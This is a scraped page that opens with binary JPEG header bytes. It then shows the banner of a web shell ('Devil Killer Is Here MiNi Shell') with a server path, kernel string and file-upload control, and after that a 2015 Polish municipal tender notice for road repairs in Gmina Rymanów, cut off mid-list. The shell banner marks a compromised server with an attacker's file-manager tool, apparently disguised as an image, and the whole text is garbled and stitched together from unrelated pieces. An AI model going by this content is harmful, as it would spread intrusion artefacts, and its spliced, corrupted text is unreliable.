JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150703/164362-N-2015.html

<p class="kh_header"><b>Rymanów: Remont drogi na dz. nr ewid. 894 w Króliku Polskim w km 0+700 - 1+700; 1000 mb x 3,00 m.
Przebudowa i remont bieżący dróg na terenie Gminy Rymanów.</b><br>
<b>Numer ogłoszenia: 164362 - 2015; data zamieszczenia: 03.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rymanów , ul. Mitkowskiego 14a, 38-480 Rymanów, woj. podkarpackie, tel. 013 4355006, faks 013 4355765.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rymanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi na dz. nr ewid. 894 w Króliku Polskim w km 0+700 - 1+700; 1000 mb x 3,00 m.
Przebudowa i remont bieżący dróg na terenie Gminy Rymanów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie niżej wymienionych i opisanych zadań:
1) Część nr 1 zamówienia: Remont drogi na dz. nr ewid. 894 w Króliku Polskim w km 0+700 - 1+700; 1000 mb x 3,00 m.
Charakterystyczne parametry: 
- Długość (jezdni) - 1000,00 mb, 
- Szerokość jezdni - 3,00 m 
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju jednostronnego w kierunku do istniejącego rowu przydrożnego o spadku 2 % na odcinkach prostych a o spadku 3 % na łukach kołowych. 
- Przekrój podłużny/niweleta drogi - niewielka korekta istniejącej trasy niwelety celem zachowania płynności jezdni. 
2) Część nr 2 zamówienia: Przebudowa i remont bieżący dróg na terenie Gminy Rymanów.
a) Remont gminnej drogi dojazdowej wraz gminnym placem manewrowym w m. Bałucianka - na działce  o nr ewid. 174/3, 174/7. 
Charakterystyczne parametry:
- Długość (jezdni) - łącznie - 68,50 mb,
- Szerokość jezdni - od 2,75 m do 7,00 m,
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju jednostronnego o spadku ~      2 % na odcinkach prostych a o spadku ~ 3 % na łukach kołowych,
- Przekrój podłużny/niweleta drogi - niewielka korekta istniejącej trasy niwelety celem zachowania płynności jezdni.
b) Przebudowa gminnej drogi dojazdowej - w m. Bzianka na działkach o nr ewid. gr 918 i 802
Charakterystyczne parametry: 
- Długość (jezdni) - 287,00 mb
- Szerokość jezdni - 2,75 m
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju dwustronnego (daszkowego) o spadku ~ 2 % na odcinkach
prostych a o spadku jednostronnym ~ 3 % na łukach kołowych.
- Przekrój podłużny/niweleta drogi - korekta istniejącej trasy niwelety celem zachowania płynności jezdni,
- Wody opadowe (deszczowe) z jezdni drogi odprowadzane (spływają z jezdni drogi) naturalnie/topograficznie wzdłuż niwelety drogi w granicach pasa drogowego.
c) Przebudowa gminnej drogi dojazdowej - w m. Sieniawa na działce o nr ewid. gr. 1216
Charakterystyczne parametry: 
- Długość (jezdni) - 80,00 mb 
- Szerokość jezdni - 2,75 m 
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju dwustronnego (daszkowego) o spadku ~ 2 % na odcinkach prostych a o spadku jednostronnym ~ 3 % na łukach kołowych. 
- Przekrój podłużny/niweleta drogi - korekta istniejącej trasy niwelety celem zachowania płynności jezdni. 
- Wody opadowe (deszczowe) z jezdni drogi odprowadzane (spływają z jezdni drogi) naturalnie/topograficznie wzdłuż niwelety drogi w granicach pasa drogowego. 
d) Przebudowa gminnej drogi dojazdowej - w m. Królik Polski na działce o nr ewid. gr. 713 
Charakterystyczne parametry: 
- Długość (jezdni) - 142,00 mb, 
- Szerokość jezdni - 2,75 m, 
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju dwustronnego (daszkowego) o spadku ~ 2 % na odcinkach prostych a o spadku jednostronnym ~ 3 % na łukach kołowych,
- Przekrój podłużny/niweleta drogi - korekta istniejącej trasy niwelety celem zachowania płynności jezdni,
- Wody opadowe (deszczowe) z jezdni drogi odprowadzane (spływają z jezdni drogi) naturalnie/topograficznie wzdłuż niwelety drogi w granicach pasa drogowego. 
e) Przebudowa gminnej drogi dojazdowej - w m. Rymanów na działce o nr ewid. gr. 3141/15 oraz w m. Posada Górna na działce o nr ewid. gr. 32. 
Charakterystyczne parametry: 
- Długość (jezdni) - 290,00 mb,
- Szerokość jezdni - do 2,75 m, 
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju dwustronnego (daszkowego) o spadku ~ 2 % na odcinkach prostych a o spadku jednostronnym ~ 3 % na łukach kołowych,
- Przekrój podłużny/niweleta drogi - korekta istniejącej trasy niwelety celem zachowania płynności jezdni,
- Wody opadowe (deszczowe) z jezdni drogi odprowadzane (spływają z jezdni drogi) naturalnie/topograficznie wzdłuż niwelety drogi w granicach pasa drogowego. 
f) Przebudowa gminnej drogi dojazdowej ul. Dębowa - w m. Rymanów Zdrój na działce o nr ewid. gr. 361. 
Charakterystyczne parametry: 
- Długość (jezdni) - ~ 70,00 mb,
- Szerokość jezdni - od 9,40 m do 4,75 m,
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju dwustronnego (daszkowego) o spadku ~ 2 % na odcinkach prostych a o spadku jednostronnym ~ 1 % w kierunku istniejącego ścieku liniowego przykrawężnikowego na odcinku ścieku przykrawężnikowego,
- Przekrój podłużny/niweleta drogi - korekta istniejącej trasy niwelety celem zachowania płynności jezdni,
- Wody opadowe (deszczowe) z jezdni drogi odprowadzane (spływają z jezdni drogi) naturalnie/topograficznie wzdłuż niwelety drogi w granicach pasa drogowego do istniejących drogowych kratek ściekowych kanalizacji deszczowej (poprzez spadek) oraz częściowo poprzez istniejący ściek liniowy przykrawężnikowy. 
 g) Przebudowa gminnej drogi dojazdowej - w m. Sieniawa - ul. Długa na działce o nr ewid. gr 1168. 
Charakterystyczne parametry: 
- Długość (jezdni) - 392,00 mb, 
- Szerokość jezdni - 3,00 m, 
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju dwustronnego (daszkowego) o spadku ~ 2 % na odcinkach prostych a o spadku jednostronnym ~ 3 % na łukach kołowych,
- Przekrój podłużny/niweleta drogi - korekta istniejącej trasy niwelety celem zachowania płynności jezdni,
- Wody opadowe (deszczowe) z jezdni drogi odprowadzane (spływają z jezdni drogi) naturalnie/topograficznie wzdłuż niwelety drogi w granicach pasa drogowego. 
h) Przebudowa gminnej drogi dojazdowej - w m. Wróblik Szlachecki na działkach o nr ewid. gr 568/7 i 1564.
Charakterystyczne parametry: 
- Długość (jezdni) - 365,00 mb, 
- Szerokość jezdni - 3,00 m,
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju dwustronnego (daszkowego) o spadku ~ 2 % na odcinkach prostych a o spadku jednostronnym ~ 3 % na łukach kołowych,
- Przekrój podłużny/niweleta drogi - korekta istniejącej trasy niwelety celem zachowania płynności jezdni,
- Wody opadowe (deszczowe) z jezdni drogi odprowadzane (spływają z jezdni drogi) naturalnie/topograficznie wzdłuż niwelety drogi w granicach pasa drogowego. 
i) Remont fragmentaryczny istniejącego odcinka drogi gminnej ul. Nadbrzeżnej w Posadzie Górnej w ramach bieżącego utrzymania dróg (odcinek od szkoły w kierunku Rymanowa
Charakterystyczne parametry: 
- Przybliżona sumaryczna powierzchnia - 1.513,50 m2, 
- Przybliżona długość - ~ 406,00 mb + 4 wjazdy, 
- Szerokość jezdni - zachowanie istniejącej ~ 3,30 m, 
- Przekrój poprzeczny jezdni - zachowanie istniejącego przekroju, 
- Przekrój podłużny/niweleta drogi - zachowanie istniejącego spadku.
Zakres robót i szczegółowy opis zamówienia w części nr 1 i 2  określony jest  załącznikach: 
Załącznik nr 9 do SIWZ  - Specyfikacje techniczne wykonania i odbioru robót  budowlanych.
Załącznik nr 10 do SIWZ  - Dokumentacja techniczna.
Załącznik nr 11 do SIWZ  - Przedmiary robót - służą tylko do uzupełnienia opisu przedmiotu zamówienia i nie są podstawą do wyliczenia ceny
2. Wymagania dotyczące przedmiotu zamówienia (dotyczy części nr 1 i 2 zamówienia).
a) Wykonawca udzieli Zamawiającemu 36 miesięcy gwarancji jakości i 36 miesięcy rękojmi za wady na roboty objęte niniejszym zamówieniem. Bieg terminu gwarancji jakości i rękojmi za wady rozpoczyna się od daty odbioru końcowego przedmiotu umowy, a w przypadku stwierdzenia wad, od ich usunięcia i przekazania Zamawiającemu przedmiotu umowy jako należycie wykonanego 
b) Wykonawca w trakcie wykonywania robót ponosi odpowiedzialność za bezpieczeństwo   swoich pracowników oraz innych osób znajdujących się w obrębie przekazanego placu budowy z tytułu prowadzonych robót. 
c) Zamawiający żąda wskazania przez Wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy. Zamawiający żąda podania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Powyższe informacje należy zamieścić  w Formularzu Ofertowym - Załącznik nr 1 do SIWZ.
d) Zamawiający zaleca Wykonawcy dokonanie wizji lokalnej w miejscach gdzie będą wykonywane roboty oraz uzyskanie na swoją odpowiedzialność i ryzyko wszelkich informacji, które mogą być konieczne do przygotowania oferty. Wszelkie koszty wizji lokalnej ponosi Wykonawca. 
e) Wszelkie użyte w załączonej dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych lub przedmiarach robót nazwy produktów, znaki towarowe, patenty lub pochodzenie nie mają na celu naruszenia art. 29  i art. 7 ustawy pzp, mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technicznych Zamawiającego.
Zamawiający dopuszcza zastosowanie przez Wykonawców rozwiązań równoważnych pod warunkiem spełnienia tego samego poziomu technologicznego, wydajnościowego, i zastosowania materiałów oraz urządzeń o nie gorszych parametrach niż określone w dokumentacji projektowej. Wykazanie równoważności, tj. spełniania wymagań określonych przez Zamawiającego  w dokumentacji stanowiącej opis przedmiotu zamówienia leży po stronie Wykonawcy. Zastosowanie urządzeń i wyrobów (materiałów), rozwiązań równoważnych musi gwarantować wykonanie konkretnych rozwiązań projektowych, które projekt realizuje, a ich zastosowanie musi zapewnić kompatybilność z zastosowanymi urządzeniami, wyrobami i technologią.
Wykonawca, który powołuje się na rozwiązania równoważne, zgodnie z art. 30 ust. 5 ustawy  pzp jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego.  W przypadku, gdy Wykonawca składa ofertę równoważną zobowiązany jest dołączyć do oferty dodatkowe dokumenty informujące o zastosowaniu równoważnych materiałów, usług lub robót oraz o ich parametrach technicznych i jakościowych. Złożone w/w dokumenty będą podlegały ocenie przez Zamawiającego. W przypadku, gdy Wykonawca nie złoży w ofercie dokumentów o zastosowaniu innych materiałów i urządzeń, to rozumie się przez to, że do kalkulacji ceny oferty i do realizacji przedmiotu zamówienia ujęto materiały i urządzenia  opisane w dokumentacji technicznej będącej załącznikiem do niniejszej SIWZ.
f) Jeżeli w dokumentacji technicznej, przedmiarze robót bądź specyfikacji technicznej wykonania i odbioru robót występują wskazania norm, aprobat, specyfikacji technicznych i systemów odniesienia, Zamawiający dopuszcza rozwiązania równoważne opisywanym (wówczas ciężar udowodnienia równoważności spoczywa na Wykonawcy).
g) Zastosowane do realizacji przedmiotu zamówienia materiały, dostarczone wyroby i urządzenia powinny odpowiadać co do jakości wymaganiom określonym w dokumentacji projektowej  i posiadać wymagane dla wyrobów dopuszczenia do obrotu i stosowania w budownictwie (ustawa z dnia 16.04.2004 r. o wyrobach budowlanych - Dz. U. Nr 92, poz. 881 ze zm. wraz z rozporządzeniami wykonawczymi). Na każde żądanie Zamawiającego lub Inspektora Nadzoru Wykonawca zobowiązany jest okazać w stosunku do wskazanych urządzeń, materiałów i wyrobów: kartę wyrobu z Aprobatą Techniczną, atest, certyfikat lub deklarację zgodności z Polską Normą, normą UE - w przypadku braku PN lub Aprobatą Techniczną. 
Zamawiający może zażądać przeprowadzenia przez Wykonawcę dodatkowych badań jakości wykonanych robót z materiałów, wyrobów i urządzeń Wykonawcy. Jeżeli okaże się, że wyniki badań potwierdzają zastrzeżenia Zamawiającego co do jakości wbudowanych materiałów, wyrobów, urządzeń bądź wykonanych robót - to koszty badań ponosi Wykonawca. W przeciwnym wypadku koszty tych badań ponosi Zamawiający. Zastosowane wyroby i materiały powinny odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie określonych w art. 10 ustawy Prawo Budowlane oraz wymaganiom dokumentacji technicznej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.30-1, 45.23.33.20-8, 45.23.32.20-7, 45.11.11.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść
wadium w wysokości: 
część nr 1 zamówienia - 6 000,00 zł (słownie: sześć  tysięcy pięćset złotych),
część nr 2 zamówienia - 11 000,00 zł (słownie: jedenaście tysięcy złotych).
2. Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6
ustawy Pzp, tj.:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
Dokumenty o których mowa w pkt b, c, d, e należy w oryginale złożyć w siedzibie Urzędu Gminy w Rymanowie w sekretariacie pokój nr 11 przed upływem terminu składania ofert. Zamawiający dopuszcza by te dokumenty były dołączone  do oferty (Nie spinać trwale z pozostałymi dokumentami).
3. Wadium wnoszone w pieniądzu musi znaleźć się na rachunku bankowym Zamawiającego przed terminem składania ofert. Za datę wniesienia wadium uważa się datę uznania wskazanego rachunku bankowego, tj. datę faktycznego wpływu środków finansowych na podany rachunek bankowy Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których  spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny. Ocena  spełnienia warunku zostanie dokonana
na podstawie złożonego oświadczenia -  Załącznik nr 2 do niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie warunkiem udziału w postępowaniu jest:
- wykazanie przez Wykonawcę, iż wykonał co najmniej jedną robotę budowlaną w zakresie  budowy i/lub przebudowy i/lub remontu drogi (dróg) o nawierzchni mineralno - bitumicznej  o wartości nie mniejszej niż 200 000 zł brutto (słownie: dwieście tysięcy złotych brutto) - dotyczy części nr 1  zamówienia.
- wykazanie przez Wykonawcę, iż wykonał co najmniej jedną robotę budowlaną w zakresie  budowy i/lub przebudowy i/lub remontu drogi (dróg) o nawierzchni mineralno - bitumicznej  o wartości nie mniejszej niż 400 000 zł brutto (słownie: czterysta tysięcy złotych brutto) - dotyczy części nr 2  zamówienia.
W przypadku składania oferty na część 1 i 2 zamówienia należy wykazać wykonanie dwóch różnych robót budowlanych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których  spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny. Ocena  spełnienia warunku zostanie dokonana
na podstawie złożonego oświadczenia -  Załącznik nr 2 do niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie warunkiem udziału w postępowaniu jest:
a) dysponowanie przez Wykonawcę na etapie realizacji zadania co najmniej 1 osobą Kierownika budowy - branża drogowa -  posiadającą uprawnienia budowlane do kierowania robotami  budowlanymi w specjalności drogowej (dotyczy części nr 1 i 2 zamówienia).
Uwaga: Zamawiający informuje, że posiadane przez osobę, o której mowa powyżej uprawnienia w wymaganym zakresie, stosownie do wymagań określonych w ogłoszeniu i SIWZ powinny być zgodne z ustawą z dnia 7 lipca 1994r, Prawo budowlane (Dz. U. z 2013 r., poz. 1409 z późn. zm.). Osoby, które posiadają uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo budowlane, uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego odpowiednie do realizacji przedmiotu zamówienia, do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie wykazują te dokumenty, jako obowiązujące.
Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza, odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (Dz. U. z 2013 r., poz. 1409 z późn. zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2008 r., Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie warunkiem udziału w postępowaniu jest: 
posiadanie środków finansowych lub zdolności kredytowej w wysokości  nie mniejszej niż 
- 200 000,00 zł  (słownie: dwieście tysięcy złotych) - dotyczy części nr 1 zamówienia).
- 400 000,00 zł (słownie: czterysta tysięcy złotych) - dotyczy części nr 2 zamówienia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
